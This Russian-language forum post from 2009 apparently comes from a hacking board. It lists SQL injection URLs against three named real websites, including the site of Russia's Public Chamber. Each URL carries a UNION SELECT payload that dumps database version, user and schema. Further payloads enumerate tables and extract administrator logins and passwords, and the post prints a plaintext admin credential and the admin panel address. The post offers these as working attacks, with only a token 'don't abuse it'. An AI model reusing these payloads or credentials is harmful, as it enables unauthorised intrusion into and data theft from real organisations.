|
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715
Репутация:
90
|
|
wap.116.ru
http://wap.116.ru/mobile/mobile.php?cmd=listbr&target=0&sost=-1'+group+by+1+union+select+1,concat_ws(0x3a,versio n(),database(),user())+--+
юзер - wap_116@10.80.12.52
бд - wap_116
версия MySQL - 5.0.51b-log
www.heaven-house.kz
http://www.heaven-house.kz/index.php?part=catalogue&item_type_id=10+union+sel ect+1,2,3,concat_ws(0x3a,version(),user(),database ()),5,6,7,8,9,10,11,12,13,14,15,16,17+--+
юзер - u51572@10.10.223.216
бд - u51572
версия MySQL - 5.0.67-log
выводятся все таблицы сразу, limit даже не нужен)
http://www.heaven-house.kz/index.php?part=catalogue&item_type_id=10+union+sel ect+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,1 6,17+from+information_schema.tables+--+
www.oprf.ru - ОБЩЕСТВЕННАЯ ПАЛАТА РФ=) Не думал что на таких сайтах могут быть уязвимости=)
http://www.oprf.ru/ru/press/conference/101+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(), database(),user()),6,7,8+--+
юзер - oprf@localhost
бд - oprf
версия MySQL - 5.0.45
выводим список всех админов с пассами)
http://www.oprf.ru/ru/press/conference/101+UNION+SELECT+1,2,3,4,group_concat(pwd,0x3a,log in),6,7,8+from+users+--+
логин главного админа - root пароль - abra
админка - http://www.oprf.ru/admin/
p.s Не злоупотреблять=)
jokester: я так и буду твои посты объединять?
Последний раз редактировалось jokester; 07.02.2009 в 21:09..
|